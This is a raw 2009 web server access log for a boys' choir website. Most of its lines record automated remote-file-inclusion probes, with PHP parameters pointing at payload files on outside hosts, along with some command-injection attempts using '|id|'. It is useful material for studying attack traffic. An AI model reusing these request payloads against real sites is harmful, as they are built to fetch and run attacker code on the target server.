61.78.62.84 - - [04/Jul/2009:08:04:42 -0700] "GET /logs/access_090612.log%20%20/?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:08:05:25 -0700] "GET /logs/access_090626.log//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:08:08:04 -0700] "GET /logs/access_090517.log%20%20//admin/business_inc/saveserver.php?thisdir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:08:09:47 -0700] "GET /logs//error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:08:09:48 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:08:10:13 -0700] "GET /logs/access_090528.log%20%20//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:08:10:16 -0700] "GET /phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:08:10:18 -0700] "GET /logs/phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:08:10:19 -0700] "GET /phphtml.php?htmlclass_path=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:08:10:30 -0700] "GET /logs/access_090528.log%20%20//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:08:10:38 -0700] "GET /logs/access_090528.log%20%20//admin/business_inc/saveserver.php?thisdir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:08:10:58 -0700] "GET /logs/access_090528.log%20%20//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:08:11:24 -0700] "GET /logs/access_090517.log%20%20//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:08:11:48 -0700] "GET /logs/access_090517.log%20%20//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:08:12:20 -0700] "GET /logs/access_090517.log%20%20//admin/business_inc/saveserver.php?thisdir=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
110.45.138.139 - - [04/Jul/2009:08:15:38 -0700] "GET /error.php?dir=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.146.231.194 - - [04/Jul/2009:08:21:05 -0700] "GET /logs/access_090528.log//inc/header.php/step_one.php?server_inc=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.146.231.194 - - [04/Jul/2009:08:21:06 -0700] "GET /logs//inc/header.php/step_one.php?server_inc=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
218.146.231.194 - - [04/Jul/2009:08:21:12 -0700] "GET /logs/access_090626.log//inc/header.php/step_one.php?server_inc=http://www.peb.com.ua/ua/log.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:08:21:28 -0700] "GET /logs/access.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:08:21:50 -0700] "GET /logs/access_090528.log%20%20//admin/business_inc/saveserver.php?thisdir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.92.118.28 - - [04/Jul/2009:08:22:12 -0700] "GET /logs/access_090612.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://vinstudio.com.ua/components/com_agora/img/members/0/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:08:24:33 -0700] "GET /logs/access_090603.log%20%20//admin/business_inc/saveserver.php?thisdir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:08:25:58 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:08:25:58 -0700] "GET /oneadmin/photogallery/include.php?path[docroot]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
65.23.158.226 - - [04/Jul/2009:08:25:58 -0700] "GET /logs/access_090410.log//oneadmin/photogallery/include.php?path[docroot]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
125.162.92.125 - - [04/Jul/2009:08:26:22 -0700] "GET /xxx/ HTTP/1.1" 200 662 "http://www.google.co.id/search?hl=id&q=%22index+of+xxx%22&btnG=Telusuri&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
125.162.92.125 - - [04/Jul/2009:08:26:29 -0700] "GET /xxx/resourcesgreg/ HTTP/1.1" 200 552 "http://www.americanboyschoir.com/xxx/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.americanboyschoir.com"
91.15.200.244 - - [04/Jul/2009:08:28:31 -0700] "GET /xxx/ HTTP/1.1" 200 662 "http://www.google.com/search?q=index+of+xxx&hl=de&lr=&safe=off&client=opera&rls=de&newwindow=1&start=10&sa=N" "Opera/9.64 (Windows NT 5.1; U; de) Presto/2.1.1" "www.americanboyschoir.com"
91.15.200.244 - - [04/Jul/2009:08:28:35 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.americanboyschoir.com/xxx/" "Opera/9.64 (Windows NT 5.1; U; de) Presto/2.1.1" "www.americanboyschoir.com"
91.15.200.244 - - [04/Jul/2009:08:28:37 -0700] "GET /xxx/resourcesgreg/ HTTP/1.1" 200 552 "http://www.americanboyschoir.com/xxx/" "Opera/9.64 (Windows NT 5.1; U; de) Presto/2.1.1" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:08:30:07 -0700] "GET /oneadmin/photogallery/include.php?path[docroot]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:08:30:07 -0700] "GET /logs/access_090318.log%20%20//oneadmin/photogallery/include.php?path[docroot]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:08:30:07 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:08:30:41 -0700] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:08:30:41 -0700] "GET /oneadmin/photogallery/include.php?path[docroot]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.234.21.178 - - [04/Jul/2009:08:30:41 -0700] "GET /logs/access_090410.log//oneadmin/photogallery/include.php?path[docroot]=http://kq-china.com/web/templates/ja_purity/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
85.214.60.181 - - [04/Jul/2009:08:32:53 -0700] "GET /logs/access_090428.log/aaaaimage;image=%7Cid%7C;type=text/plain HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
85.214.60.181 - - [04/Jul/2009:08:32:54 -0700] "GET /aaaaimage;image=%7Cid%7C;type=text/plain HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
85.214.60.181 - - [04/Jul/2009:08:32:54 -0700] "GET /logs/aaaaimage;image=%7Cid%7C;type=text/plain HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
122.153.28.140 - - [04/Jul/2009:08:34:32 -0700] "GET /logs/access_090603.log%20%20//admin/business_inc/saveserver.php?thisdir=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:08:35:38 -0700] "GET /modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:08:35:38 -0700] "GET /logs/access_090626.log%20%20//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:08:35:39 -0700] "GET /logs//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:08:35:44 -0700] "GET /modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:08:35:44 -0700] "GET /logs/access_090626.log%20%20//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:08:35:44 -0700] "GET /logs//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:08:36:11 -0700] "GET /logs/access_090622.log%20%20//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.29.81.145 - - [04/Jul/2009:08:36:14 -0700] "GET /logs/access_090622.log%20%20//modules/mod_calendar.php?absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
80.247.76.181 - - [04/Jul/2009:08:38:56 -0700] "GET /logs/access_090603.log/index.php?redir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
80.247.76.181 - - [04/Jul/2009:08:38:56 -0700] "GET /logs/index.php?redir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
80.247.76.181 - - [04/Jul/2009:08:38:56 -0700] "GET /index.php?redir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:39:20 -0700] "GET /_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:39:23 -0700] "GET /logs/access_090626.log//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:39:32 -0700] "GET /logs//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
80.247.76.181 - - [04/Jul/2009:08:39:34 -0700] "GET /logs/access_090414.log/index.php?redir=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:39:44 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:39:44 -0700] "GET /logs/access_090410.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:39:44 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:39:45 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:39:45 -0700] "GET /logs/access_090410.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
125.251.147.130 - - [04/Jul/2009:08:39:45 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.americanboyschoir.com"
194.109.22.117 - - [04/Jul/2009:08:40:23 -0700] "GET /logs/access_090603.log/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.117 - - [04/Jul/2009:08:40:24 -0700] "GET /logs/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.117 - - [04/Jul/2009:08:40:26 -0700] "GET /index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.67 - - [04/Jul/2009:08:40:42 -0700] "GET /logs/access_090603.log/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.67 - - [04/Jul/2009:08:40:42 -0700] "GET /logs/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.67 - - [04/Jul/2009:08:40:42 -0700] "GET /index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:41:04 -0700] "GET /logs/access_090626.log//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:41:04 -0700] "GET /logs//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:41:05 -0700] "GET /_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:41:11 -0700] "GET /logs/access_090626.log//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:41:12 -0700] "GET /_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:41:12 -0700] "GET /logs//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
62.193.216.69 - - [04/Jul/2009:08:41:26 -0700] "GET //tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.193.216.69 - - [04/Jul/2009:08:41:26 -0700] "GET /logs/access_090528.log%20%20///tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
62.193.216.69 - - [04/Jul/2009:08:41:26 -0700] "GET /logs///tools/send_reminders.php?noSet=0&includedir=http://aboutav.com//id1.txt????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:41:30 -0700] "GET /logs/access_090626.log//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:41:30 -0700] "GET /logs//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:41:31 -0700] "GET /_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
213.201.230.140 - - [04/Jul/2009:08:41:45 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fd.axl-jp.net//assets/export/_MD.TXT??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.americanboyschoir.com"
213.201.230.140 - - [04/Jul/2009:08:41:52 -0700] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://fd.axl-jp.net//assets/export/_MD.TXT??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.americanboyschoir.com"
80.247.76.181 - - [04/Jul/2009:08:42:06 -0700] "GET /logs/access_090626.log/phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
80.247.76.181 - - [04/Jul/2009:08:42:06 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
80.247.76.181 - - [04/Jul/2009:08:42:06 -0700] "GET /phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
194.109.22.117 - - [04/Jul/2009:08:42:15 -0700] "GET /logs/access_090414.log/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
76.97.26.124 - - [04/Jul/2009:08:42:23 -0700] "GET /xxx/ HTTP/1.1" 200 662 "http://www.google.com/url?sa=t&source=web&ct=res&cd=2&url=http%3A%2F%2Fwww.americanboyschoir.com%2Fxxx%2F&ei=HXdPStuCLtCktwefoqimBA&rct=j&q=%22xxx%22+index+of&usg=AFQjCNHCFAYLPUYgfA8S348PVpUY0RJLKQ" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "www.americanboyschoir.com"
76.97.26.124 - - [04/Jul/2009:08:42:24 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "www.americanboyschoir.com"
76.97.26.124 - - [04/Jul/2009:08:42:26 -0700] "GET /xxx/resourcesgreg/ HTTP/1.1" 200 552 "http://www.americanboyschoir.com/xxx/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "www.americanboyschoir.com"
76.97.26.124 - - [04/Jul/2009:08:42:26 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "www.americanboyschoir.com"
76.97.26.124 - - [04/Jul/2009:08:42:26 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:08:42:39 -0700] "GET /logs/access_090318.log//oneadmin/photogallery/include.php?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:08:42:39 -0700] "GET /logs//oneadmin/photogallery/include.php?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
60.43.229.5 - - [04/Jul/2009:08:42:39 -0700] "GET /oneadmin/photogallery/include.php?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
194.109.22.67 - - [04/Jul/2009:08:42:40 -0700] "GET /logs/access_090414.log/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.109 - - [04/Jul/2009:08:42:42 -0700] "GET /index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.109 - - [04/Jul/2009:08:42:45 -0700] "GET /logs/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
194.109.22.109 - - [04/Jul/2009:08:42:49 -0700] "GET /logs/access_090603.log/index.php?redir=http://gec.kmu.edu.tw/course/service/web//images/studen/ivid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:43:47 -0700] "GET /_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:43:48 -0700] "GET /logs//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:08:43:49 -0700] "GET /logs/access_090626.log%20//_head.php?_zb_path=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/idx.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:44:02 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:44:02 -0700] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.11.230.36 - - [04/Jul/2009:08:44:02 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
80.247.76.181 - - [04/Jul/2009:08:44:33 -0700] "GET /logs/access.log%20/phphtml.php?htmlclass_path=http://www.ksi-klasa.pl//104/Rosid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.americanboyschoir.com"
